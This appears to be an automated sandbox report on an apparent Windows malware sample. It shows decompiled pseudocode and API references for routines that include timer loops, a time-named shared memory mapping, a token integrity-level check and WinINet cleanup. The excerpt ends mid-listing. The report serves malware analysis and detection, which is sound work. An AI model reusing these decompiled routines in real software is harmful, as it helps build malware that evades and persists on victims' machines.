                            0x006d8130
                            0x006d815e
                            0x006d8168
                            0x006d816c
                            0x006d8174
                            0x006d8177
                            0x006d817e
                            0x006d8188
                            0x006d8188
                            0x006d818c
                            0x006d8191
                            0x006d81a0
                            0x006d81a6
                            0x006d81a6
                            0x006d818c
                            0x00000000
                            0x006d8137
                            0x006d813a
                            0x006d8142
                            0x006d8157
                            0x006d815c
                            0x00000000
                            0x00000000
                            0x006d815c
                            0x00000000
                            0x006d8142
                            0x006d8130
                            0x006d812b
                            0x006d8071
                            0x006d8078
                            0x006d8088
                            0x006d808b
                            0x006d8091
                            0x006d8095
                            0x006d80d8
                            0x006d80e4
                            0x006d810d
                            0x006d80e6
                            0x006d80ea
                            0x006d80f0
                            0x006d80f8
                            0x006d80fa
                            0x006d80fd
                            0x006d8103
                            0x006d8105
                            0x006d8105
                            0x006d80f8
                            0x006d80ea
                            0x00000000
                            0x006d80e4
                            0x006d809d
                            0x006d80a0
                            0x006d80a7
                            0x006d80b7
                            0x006d80ba
                            0x006d80ca
                            0x00000000
                            0x006d80d0
                            0x006d80b1
                            0x006d80b5
                            0x00000000
                            0x00000000
                            0x00000000
                            0x006d80b5
                            0x006d8082
                            0x006d8086
                            0x00000000
                            0x00000000
                            0x00000000
                            0x006d8086
                            0x006d805f
                            0x006d8063
                            0x00000000
                            0x00000000
                            0x00000000

                            APIs
                            • RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 006D800E
                            • LoadLibraryA.KERNELBASE(?), ref: 006D808B
                            • GetLastError.KERNEL32 ref: 006D8097
                            • RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 006D80CA
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.505745541.00000000006D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.505731585.00000000006D0000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505786460.00000000006D9000.00000002.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505804953.00000000006DA000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505825870.00000000006DC000.00000002.10000000.00040000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_main.jbxd
                            Similarity
                            • API ID: ExceptionRaise$ErrorLastLibraryLoad
                            • String ID: $
                            • API String ID: 948315288-3993045852
                            • Opcode ID: c40a77443548fd6a9ad9214a8d57bb7d1b097c5f0c63ceb5df6936485419e756
                            • Instruction ID: 2c8ad06611e9c28c4123de823ac82c4c83d6737cb5b347414a99e815b03f0891
                            • Opcode Fuzzy Hash: c40a77443548fd6a9ad9214a8d57bb7d1b097c5f0c63ceb5df6936485419e756
                            • Instruction Fuzzy Hash: D7810971E01606AFDB20CF99DC85BAEB7F6BB58310F14802AE515E7350EB70E949CB60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 006D517A Relevance: 16.7, APIs: 11, Instructions: 151timememoryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 183 6d517a-6d51ac memset CreateWaitableTimerA 184 6d532d-6d5333 GetLastError 183->184 185 6d51b2-6d520b _allmul SetWaitableTimer WaitForMultipleObjects 183->185 186 6d5337-6d5341 184->186 187 6d5295-6d529b 185->187 188 6d5211-6d5214 185->188 189 6d529c-6d52a0 187->189 190 6d521f 188->190 191 6d5216 call 6d61fe 188->191 192 6d52b0-6d52b4 189->192 193 6d52a2-6d52aa HeapFree 189->193 195 6d5229 190->195 196 6d521b-6d521d 191->196 192->189 197 6d52b6-6d52c0 CloseHandle 192->197 193->192 198 6d522d-6d5232 195->198 196->190 196->195 197->186 199 6d5245-6d5272 call 6d64a2 198->199 200 6d5234-6d523b 198->200 204 6d5274-6d527f 199->204 205 6d52c2-6d52c7 199->205 200->199 201 6d523d 200->201 201->199 204->198 208 6d5281-6d528c call 6d6821 204->208 206 6d52c9-6d52cf 205->206 207 6d52e6-6d52ee 205->207 206->187 209 6d52d1-6d52e4 call 6d14c6 206->209 210 6d52f4-6d5322 _allmul SetWaitableTimer WaitForMultipleObjects 207->210 214 6d5291 208->214 209->210 210->198 213 6d5328 210->213 213->187 214->187
                            C-Code - Quality: 83%
                            			E006D517A(void* __edx, intOrPtr _a4, intOrPtr _a8) {
				void _v48;
				long _v52;
				struct %anon52 _v60;
				char _v72;
				long _v76;
				void* _v80;
				union _LARGE_INTEGER _v84;
				struct %anon52 _v92;
				void* _v96;
				void* _v100;
				union _LARGE_INTEGER _v104;
				long _v108;
				struct %anon52 _v124;
				long _v128;
				struct %anon52 _t46;
				void* _t51;
				long _t53;
				void* _t54;
				struct %anon52 _t61;
				long _t65;
				struct %anon52 _t66;
				intOrPtr _t68;
				void* _t69;
				void* _t73;
				signed int _t74;
				void* _t76;
				void* _t78;
				void** _t82;
				signed int _t86;
				void* _t89;

				_t76 = __edx;
				_v52 = 0;
				memset( &_v48, 0, 0x2c);
				_t89 = (_t86 & 0xfffffff8) - 0x54 + 0xc;
				_t46 = CreateWaitableTimerA(0, 1, 0);
				_v60 = _t46;
				if(_t46 == 0) {
					_v92.HighPart = GetLastError();
				} else {
					_push(0xffffffff);
					_push(0xff676980);
					_push(0);
					_push( *0x6da2e0);
					_v76 = 0;
					_v80 = 0;
					L006D82AA();
					_v84.LowPart = _t46;
					_v80 = _t76;
					SetWaitableTimer(_v76,  &_v84, 0, 0, 0, 0);
					_t51 =  *0x6da30c; // 0x18c
					_v76 = _t51;
					_t53 = WaitForMultipleObjects(2,  &_v80, 0, 0xffffffff);
					_v108 = _t53;
					if(_t53 == 0) {
						if(_a8 != 0) {
							L4:
							 *0x6da2ec = 5;
						} else {
							_t69 = E006D61FE(_t76); // executed
							if(_t69 != 0) {
								goto L4;
							}
						}
						_v104.LowPart = 0;
						L6:
						L6:
						if(_v104.LowPart == 1 && ( *0x6da300 & 0x00000001) == 0) {
							_v104.LowPart = 2;
						}
						_t74 = _v104.LowPart;
						_t58 = _t74 << 4;
						_t78 = _t89 + (_t74 << 4) + 0x38;
						_t75 = _t74 + 1;
						_v92.LowPart = _t74 + 1;
						_t61 = E006D64A2( &_v96, _t75, _t89 + _t58 + 0x38, _t78,  &_v100); // executed
						_v124 = _t61;
						if(_t61 != 0) {
							goto L17;
						}
						_t66 = _v92;
						_v104.LowPart = _t66;
						if(_t66 != 3) {
							goto L6;
						} else {
							_t68 = E006D6821(_t75,  &_v72, _a4, _a8); // executed
							_v124.HighPart = _t68;
						}
						goto L12;
						L17:
						__eflags = _t61 - 0x10d2;
						if(_t61 != 0x10d2) {
							_push(0xffffffff);
							_push(0xff676980);
							_push(0);
							_push( *0x6da2e4);
							goto L21;
						} else {
							__eflags =  *0x6da2e8; // 0x0
							if(__eflags == 0) {
								goto L12;
							} else {
								_t61 = E006D14C6();
								_push(0xffffffff);
								_push(0xdc3cba00);
								_push(0);
								_push( *0x6da2e8);
								L21:
								L006D82AA();
								_v104.LowPart = _t61;
								_v100 = _t78;
								SetWaitableTimer(_v96,  &_v104, 0, 0, 0, 0); // executed
								_t65 = WaitForMultipleObjects(2,  &_v100, 0, 0xffffffff);
								_v128 = _t65;
								__eflags = _t65;
								if(_t65 == 0) {
									goto L6;
								} else {
									goto L12;
								}
							}
						}
						L25:
					}
					L12:
					_t82 =  &_v72;
					_t73 = 3;
					do {
						_t54 =  *_t82;
						if(_t54 != 0) {
							HeapFree( *0x6da2d8, 0, _t54);
						}
						_t82 =  &(_t82[4]);
						_t73 = _t73 - 1;
					} while (_t73 != 0);
					CloseHandle(_v80);
				}
				return _v92.HighPart;
				goto L25;
			}

































                            0x006d517a
                            0x006d5190
                            0x006d5194
                            0x006d5199
                            0x006d51a0
                            0x006d51a6
                            0x006d51ac
                            0x006d5333
                            0x006d51b2
                            0x006d51b2
                            0x006d51b4
                            0x006d51b9
                            0x006d51ba
                            0x006d51c0
                            0x006d51c4
                            0x006d51c8
                            0x006d51d6
                            0x006d51e4
                            0x006d51e8
                            0x006d51ea
                            0x006d51f7
                            0x006d5203
                            0x006d5205
                            0x006d520b
                            0x006d5214
                            0x006d521f
                            0x006d521f
                            0x006d5216
                            0x006d5216
                            0x006d521d
                            0x00000000
                            0x00000000
                            0x006d521d
                            0x006d5229
                            0x00000000
                            0x006d522d
                            0x006d5232
                            0x006d523d
                            0x006d523d
                            0x006d5245
                            0x006d524b
                            0x006d5253
                            0x006d525c
                            0x006d5263
                            0x006d5267
                            0x006d526c
                            0x006d5272
                            0x00000000
                            0x00000000
                            0x006d5274
                            0x006d5278
                            0x006d527f
                            0x00000000
                            0x006d5281
                            0x006d528c
                            0x006d5291
                            0x006d5291
                            0x00000000
                            0x006d52c2
                            0x006d52c2
                            0x006d52c7
                            0x006d52e6
                            0x006d52e8
                            0x006d52ed
                            0x006d52ee
                            0x00000000
                            0x006d52c9
                            0x006d52c9
                            0x006d52cf
                            0x00000000
                            0x006d52d1
                            0x006d52d1
                            0x006d52d6
                            0x006d52d8
                            0x006d52dd
                            0x006d52de
                            0x006d52f4
                            0x006d52f4
                            0x006d52fc
                            0x006d530a
                            0x006d530e
                            0x006d531a
                            0x006d531c
                            0x006d5320
                            0x006d5322
                            0x00000000
                            0x006d5328
                            0x00000000
                            0x006d5328
                            0x006d5322
                            0x006d52cf
                            0x00000000
                            0x006d52c7
                            0x006d5295
                            0x006d5297
                            0x006d529b
                            0x006d529c
                            0x006d529c
                            0x006d52a0
                            0x006d52aa
                            0x006d52aa
                            0x006d52b0
                            0x006d52b3
                            0x006d52b3
                            0x006d52ba
                            0x006d52ba
                            0x006d5341
                            0x00000000

                            APIs
                            • memset.NTDLL ref: 006D5194
                            • CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 006D51A0
                            • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 006D51C8
                            • SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000), ref: 006D51E8
                            • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,?,?,?,?,?,?,?,?,006D1273,?), ref: 006D5203
                            • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,006D1273,?,00000000), ref: 006D52AA
                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,006D1273,?,00000000,?,?), ref: 006D52BA
                            • _allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 006D52F4
                            • SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,?), ref: 006D530E
                            • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 006D531A
                              • Part of subcall function 006D61FE: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,014A93D8,00000000,?,74D0F710,00000000,74D0F730), ref: 006D624D
                              • Part of subcall function 006D61FE: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,014A9410,?,00000000,30314549,00000014,004F0053,014A93CC), ref: 006D62EA
                              • Part of subcall function 006D61FE: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,006D521B), ref: 006D62FC
                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,006D1273,?,00000000,?,?), ref: 006D532D
                            Memory Dump Source
                            • Source File: 00000000.00000002.505745541.00000000006D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.505731585.00000000006D0000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505786460.00000000006D9000.00000002.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505804953.00000000006DA000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505825870.00000000006DC000.00000002.10000000.00040000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_main.jbxd
                            Similarity
                            • API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
                            • String ID:
                            • API String ID: 3521023985-0
                            • Opcode ID: 21f46562f1eae466ad17a8e25cba66c0c1d45648ae6f6fd4cc0e5893f36cc06f
                            • Instruction ID: 502b6a64d36ba1a49f4e0f4451fc5ea3ebd53110780736891db1332f2f234963
                            • Opcode Fuzzy Hash: 21f46562f1eae466ad17a8e25cba66c0c1d45648ae6f6fd4cc0e5893f36cc06f
                            • Instruction Fuzzy Hash: 90514D71909310AFC750AF659C44D9BBBEAEF89320F104A1FF4A5D2360D7708644CFA6
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 006D60A1 Relevance: 13.6, APIs: 9, Instructions: 72filetimeCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            C-Code - Quality: 74%
                            			E006D60A1(intOrPtr __edx, void** _a4, void** _a8) {
				intOrPtr _v8;
				struct _FILETIME* _v12;
				short _v56;
				struct _FILETIME* _t12;
				intOrPtr _t13;
				void* _t17;
				void* _t21;
				intOrPtr _t27;
				long _t28;
				void* _t30;

				_t27 = __edx;
				_t12 =  &_v12;
				GetSystemTimeAsFileTime(_t12);
				_push(0x192);
				_push(0x54d38000);
				_push(_v8);
				_push(_v12);
				L006D82A4();
				_push(_t12);
				_v12 = _t12;
				_t13 =  *0x6da348; // 0xdcd5a8
				_t5 = _t13 + 0x6db87a; // 0x14a8e22
				_t6 = _t13 + 0x6db594; // 0x530025
				_push(0x16);
				_push( &_v56);
				_v8 = _t27;
				L006D7F0A();
				_t17 = CreateFileMappingW(0xffffffff, 0x6da34c, 4, 0, 0x1000,  &_v56); // executed
				_t30 = _t17;
				if(_t30 == 0) {
					_t28 = GetLastError();
				} else {
					if(GetLastError() == 0xb7) {
						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
						if(_t21 == 0) {
							_t28 = GetLastError();
							if(_t28 != 0) {
								goto L6;
							}
						} else {
							 *_a4 = _t30;
							 *_a8 = _t21;
							_t28 = 0;
						}
					} else {
						_t28 = 2;
						L6:
						CloseHandle(_t30);
					}
				}
				return _t28;
			}













                            0x006d60a1
                            0x006d60a9
                            0x006d60ad
                            0x006d60b3
                            0x006d60b8
                            0x006d60bd
                            0x006d60c0
                            0x006d60c3
                            0x006d60c8
                            0x006d60c9
                            0x006d60cc
                            0x006d60d1
                            0x006d60d8
                            0x006d60e2
                            0x006d60e4
                            0x006d60e5
                            0x006d60e8
                            0x006d6104
                            0x006d610a
                            0x006d610e
                            0x006d615c
                            0x006d6110
                            0x006d611d
                            0x006d612d
                            0x006d6135
                            0x006d6147
                            0x006d614b
                            0x00000000
                            0x00000000
                            0x006d6137
                            0x006d613a
                            0x006d613f
                            0x006d6141
                            0x006d6141
                            0x006d611f
                            0x006d6121
                            0x006d614d
                            0x006d614e
                            0x006d614e
                            0x006d611d
                            0x006d6163

                            APIs
                            • GetSystemTimeAsFileTime.KERNEL32(?,?,00000000,?,?,?,?,?,?,006D113B,?,?,4D283A53,?,?), ref: 006D60AD
                            • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 006D60C3
                            • _snwprintf.NTDLL ref: 006D60E8
                            • CreateFileMappingW.KERNELBASE(000000FF,006DA34C,00000004,00000000,00001000,?,?,?,?,?,00000000), ref: 006D6104
                            • GetLastError.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,006D113B,?,?,4D283A53,?), ref: 006D6116
                            • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000,?,?,?,?,00000000), ref: 006D612D
                            • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,?,?,?,?,?,006D113B,?,?,4D283A53), ref: 006D614E
                            • GetLastError.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,006D113B,?,?,4D283A53,?), ref: 006D6156
                            Memory Dump Source
                            • Source File: 00000000.00000002.505745541.00000000006D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.505731585.00000000006D0000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505786460.00000000006D9000.00000002.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505804953.00000000006DA000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505825870.00000000006DC000.00000002.10000000.00040000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_main.jbxd
                            Similarity
                            • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                            • String ID:
                            • API String ID: 1814172918-0
                            • Opcode ID: e6781826cedba015d0a6047c370e2a12d3b5d3dcec3d228349416feed7d49842
                            • Instruction ID: 5e39738df0bd45feb47baddfb632401307f85c61fa46d32f8cfbefa379bf34b0
                            • Opcode Fuzzy Hash: e6781826cedba015d0a6047c370e2a12d3b5d3dcec3d228349416feed7d49842
                            • Instruction Fuzzy Hash: 96219072E01204BBD721AB68DC05FAE7BBBAB48750F254027F609E73D1DBB19905CB60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 006D70E7 Relevance: 12.1, APIs: 8, Instructions: 75networkCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 258 6d70e7-6d70f2 259 6d70fe-6d7111 258->259 260 6d70f4-6d70f9 call 6d2129 258->260 262 6d711c-6d7121 259->262 263 6d7113-6d711a InternetSetStatusCallback InternetCloseHandle 259->263 260->259 264 6d712c-6d7131 262->264 265 6d7123-6d712a InternetSetStatusCallback InternetCloseHandle 262->265 263->262 266 6d713c-6d7147 264->266 267 6d7133-6d713a InternetSetStatusCallback InternetCloseHandle 264->267 265->264 268 6d714c-6d7151 266->268 269 6d7149-6d714a CloseHandle 266->269 267->266 270 6d7156-6d715d 268->270 271 6d7153-6d7154 CloseHandle 268->271 269->268 272 6d715f-6d7168 call 6d789e 270->272 273 6d716b-6d7170 270->273 271->270 272->273 275 6d7178-6d717c 273->275 276 6d7172-6d7173 call 6d789e 273->276 279 6d717e-6d717f call 6d789e 275->279 280 6d7184-6d7189 275->280 276->275 279->280 282 6d718b-6d718c call 6d789e 280->282 283 6d7191-6d7193 280->283 282->283
                            C-Code - Quality: 93%
                            			E006D70E7(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edi) {
				void* _t17;
				void* _t18;
				void* _t19;
				void* _t20;
				void* _t21;
				intOrPtr _t24;
				void* _t37;
				void* _t41;
				intOrPtr* _t45;

				_t41 = __edi;
				_t37 = __ebx;
				_t45 = __eax;
				_t16 =  *((intOrPtr*)(__eax + 0x20));
				if( *((intOrPtr*)(__eax + 0x20)) != 0) {
					E006D2129(_t16, __ecx, 0xea60);
				}
				_t17 =  *(_t45 + 0x18);
				_push(_t37);
				_push(_t41);
				if(_t17 != 0) {
					InternetSetStatusCallback(_t17, 0);
					InternetCloseHandle( *(_t45 + 0x18)); // executed
				}
				_t18 =  *(_t45 + 0x14);
				if(_t18 != 0) {
					InternetSetStatusCallback(_t18, 0);
					InternetCloseHandle( *(_t45 + 0x14));
				}
				_t19 =  *(_t45 + 0x10);
				if(_t19 != 0) {
					InternetSetStatusCallback(_t19, 0);
					InternetCloseHandle( *(_t45 + 0x10));
				}
				_t20 =  *(_t45 + 0x1c);
				if(_t20 != 0) {
					CloseHandle(_t20);
				}
				_t21 =  *(_t45 + 0x20);
				if(_t21 != 0) {
					CloseHandle(_t21);
				}
				_t22 =  *((intOrPtr*)(_t45 + 8));
				if( *((intOrPtr*)(_t45 + 8)) != 0) {
					E006D789E(_t22);
					 *((intOrPtr*)(_t45 + 8)) = 0;
					 *((intOrPtr*)(_t45 + 0x30)) = 0;
				}
				_t23 =  *((intOrPtr*)(_t45 + 0xc));
				if( *((intOrPtr*)(_t45 + 0xc)) != 0) {
					E006D789E(_t23);
				}
				_t24 =  *_t45;
				if(_t24 != 0) {
					_t24 = E006D789E(_t24);
				}
				_t46 =  *((intOrPtr*)(_t45 + 4));
				if( *((intOrPtr*)(_t45 + 4)) != 0) {
					return E006D789E(_t46);
				}
				return _t24;
			}












                            0x006d70e7
                            0x006d70e7
                            0x006d70e9
                            0x006d70eb
                            0x006d70f2
                            0x006d70f9
                            0x006d70f9
                            0x006d70fe
                            0x006d7101
                            0x006d7108
                            0x006d7111
                            0x006d7115
                            0x006d711a
                            0x006d711a
                            0x006d711c
                            0x006d7121
                            0x006d7125
                            0x006d712a
                            0x006d712a
                            0x006d712c
                            0x006d7131
                            0x006d7135
                            0x006d713a
                            0x006d713a
                            0x006d713c
                            0x006d7147
                            0x006d714a
                            0x006d714a
                            0x006d714c
                            0x006d7151
                            0x006d7154
                            0x006d7154
                            0x006d7156
                            0x006d715d
                            0x006d7160
                            0x006d7165
                            0x006d7168
                            0x006d7168
                            0x006d716b
                            0x006d7170
                            0x006d7173
                            0x006d7173
                            0x006d7178
                            0x006d717c
                            0x006d717f
                            0x006d717f
                            0x006d7184
                            0x006d7189
                            0x00000000
                            0x006d718c
                            0x006d7193

                            APIs
                            • InternetSetStatusCallback.WININET(?,00000000), ref: 006D7115
                            • InternetCloseHandle.WININET(?), ref: 006D711A
                            • InternetSetStatusCallback.WININET(?,00000000), ref: 006D7125
                            • InternetCloseHandle.WININET(?), ref: 006D712A
                            • InternetSetStatusCallback.WININET(?,00000000), ref: 006D7135
                            • InternetCloseHandle.WININET(?), ref: 006D713A
                            • CloseHandle.KERNEL32(?,00000000,00000102,?,?,006D5DA7,?,?,74CF81D0,00000000,00000000), ref: 006D714A
                            • CloseHandle.KERNEL32(?,00000000,00000102,?,?,006D5DA7,?,?,74CF81D0,00000000,00000000), ref: 006D7154
                              • Part of subcall function 006D2129: WaitForMultipleObjects.KERNEL32(00000002,006D7C1D,00000000,006D7C1D,?,?,?,006D7C1D,0000EA60), ref: 006D2144
                            Memory Dump Source
                            • Source File: 00000000.00000002.505745541.00000000006D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.505731585.00000000006D0000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505786460.00000000006D9000.00000002.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505804953.00000000006DA000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505825870.00000000006DC000.00000002.10000000.00040000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_main.jbxd
                            Similarity
                            • API ID: Internet$CloseHandle$CallbackStatus$MultipleObjectsWait
                            • String ID:
                            • API String ID: 2824497044-0
                            • Opcode ID: 98f7bcf0d0f0331b74f186d903684da46be2ce648ffd9e1c65909177d995a796
                            • Instruction ID: 39c10c24b924e660fec2eb7dac11658e25739b258cc435fd2c15e406b3cd0c22
                            • Opcode Fuzzy Hash: 98f7bcf0d0f0331b74f186d903684da46be2ce648ffd9e1c65909177d995a796
                            • Instruction Fuzzy Hash: 1911FC76E047486BC630AFAAEC84C5BB7EBAB593003690E1EF145D3711D724FC448A65
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 006D578B Relevance: 10.6, APIs: 7, Instructions: 75COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 297 6d578b-6d57a6 298 6d57ac-6d57c5 OpenProcessToken 297->298 299 6d5845-6d5851 297->299 300 6d5844 298->300 301 6d57c7-6d57f2 GetTokenInformation * 2 298->301 300->299 302 6d583a-6d5843 CloseHandle 301->302 303 6d57f4-6d5801 call 6d7a71 301->303 302->300 306 6d5839 303->306 307 6d5803-6d5814 GetTokenInformation 303->307 306->302 308 6d5816-6d5830 GetSidSubAuthorityCount GetSidSubAuthority 307->308 309 6d5833-6d5834 call 6d789e 307->309 308->309 309->306
                            C-Code - Quality: 100%
                            			E006D578B(long* _a4) {
				long _v8;
				void* _v12;
				void _v16;
				long _v20;
				int _t33;
				void* _t46;

				_v16 = 1;
				_v20 = 0x2000;
				if( *0x6da2fc > 5) {
					_v16 = 0;
					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
						_v8 = 0;
						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
						if(_v8 != 0) {
							_t46 = E006D7A71(_v8);
							if(_t46 != 0) {
								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
								if(_t33 != 0) {
									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
								}
								E006D789E(_t46);
							}
						}
						CloseHandle(_v12);
					}
				}
				 *_a4 = _v20;
				return _v16;
			}









                            0x006d5798
                            0x006d579f
                            0x006d57a6
                            0x006d57ba
                            0x006d57c5
                            0x006d57dd
                            0x006d57ea
                            0x006d57ed
                            0x006d57f2
                            0x006d57fd
                            0x006d5801
                            0x006d5810
                            0x006d5814
                            0x006d5830
                            0x006d5830
                            0x006d5834
                            0x006d5834
                            0x006d5839
                            0x006d583d
                            0x006d5843
                            0x006d5844
                            0x006d584b
                            0x006d5851

                            APIs
                            • OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 006D57BD
                            • GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,?,00000000), ref: 006D57DD
                            • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 006D57ED
                            • CloseHandle.KERNEL32(00000000), ref: 006D583D
                              • Part of subcall function 006D7A71: RtlAllocateHeap.NTDLL(00000000,00000000,006D4DB1), ref: 006D7A7D
                            • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,?,?,?,?), ref: 006D5810
                            • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 006D5818
                            • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 006D5828
                            Memory Dump Source
                            • Source File: 00000000.00000002.505745541.00000000006D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.505731585.00000000006D0000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505786460.00000000006D9000.00000002.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505804953.00000000006DA000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505825870.00000000006DC000.00000002.10000000.00040000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_main.jbxd
                            Similarity
                            • API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
                            • String ID:
                            • API String ID: 1295030180-0
                            • Opcode ID: 7c98b45fc02c6abc6dbdb9b8c3ecb2f9170500ff2bb79b5ff4571dbed9128312
                            • Instruction ID: 714a1f7cf6d130cc7c00b48acb8199db712a297552a811bd0cea2e606dd09c59
                            • Opcode Fuzzy Hash: 7c98b45fc02c6abc6dbdb9b8c3ecb2f9170500ff2bb79b5ff4571dbed9128312
                            • Instruction Fuzzy Hash: 41213975D00219FFEB009F94DC44EEEBBBAEB48304F1040AAE911A6261D7714E44EB61
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 006D2281 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68stringCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            C-Code - Quality: 64%
                            			E006D2281(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _t9;
				intOrPtr _t13;
				char* _t19;
				char* _t28;
				void* _t33;
				void* _t34;
				char* _t36;
				void* _t38;
				intOrPtr* _t39;
				char* _t40;
				char* _t42;
				char* _t43;

				_t34 = __edx;
				_push(__ecx);
				_t9 =  *0x6da348; // 0xdcd5a8
				_t1 = _t9 + 0x6db624; // 0x253d7325
				_t36 = 0;
				_t28 = E006D6779(__ecx, _t1);
				if(_t28 != 0) {
					_t39 = __imp__;
					_t13 =  *_t39(_t28, _t38);
					_v8 = _t13;
					_t6 =  *_t39(_a4) + 1; // 0x14a9601
					_t40 = E006D7A71(_v8 + _t6);
					if(_t40 != 0) {
						strcpy(_t40, _t28);
						_pop(_t33);
						__imp__(_t40, _a4);
						_t19 = E006D44D8(_t33, _t34, _t40, _a8); // executed
						_t36 = _t19;
						E006D789E(_t40);
						_t42 = E006D17F0(StrTrimA(_t36, "="), _t36);
						if(_t42 != 0) {
							E006D789E(_t36);
							_t36 = _t42;
						}
						_t43 = E006D5454(_t36, _t33);
						if(_t43 != 0) {
							E006D789E(_t36);
							_t36 = _t43;
						}
					}
					E006D789E(_t28);
				}
				return _t36;
			}
















                            0x006d2281
                            0x006d2284
                            0x006d2285
                            0x006d228c
                            0x006d2293
                            0x006d229a
                            0x006d229e
                            0x006d22a5
                            0x006d22ac
                            0x006d22b1
                            0x006d22b9
                            0x006d22c3
                            0x006d22c7
                            0x006d22cb
                            0x006d22d1
                            0x006d22d6
                            0x006d22e0
                            0x006d22e6
                            0x006d22e8
                            0x006d22ff
                            0x006d2303
                            0x006d2306
                            0x006d230b
                            0x006d230b
                            0x006d2314
                            0x006d2318
                            0x006d231b
                            0x006d2320
                            0x006d2320
                            0x006d2318
                            0x006d2323
                            0x006d2328
                            0x006d232e

                            APIs
                              • Part of subcall function 006D6779: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,006D229A,253D7325,00000000,00000000,?,7491C740,006D3831), ref: 006D67E0
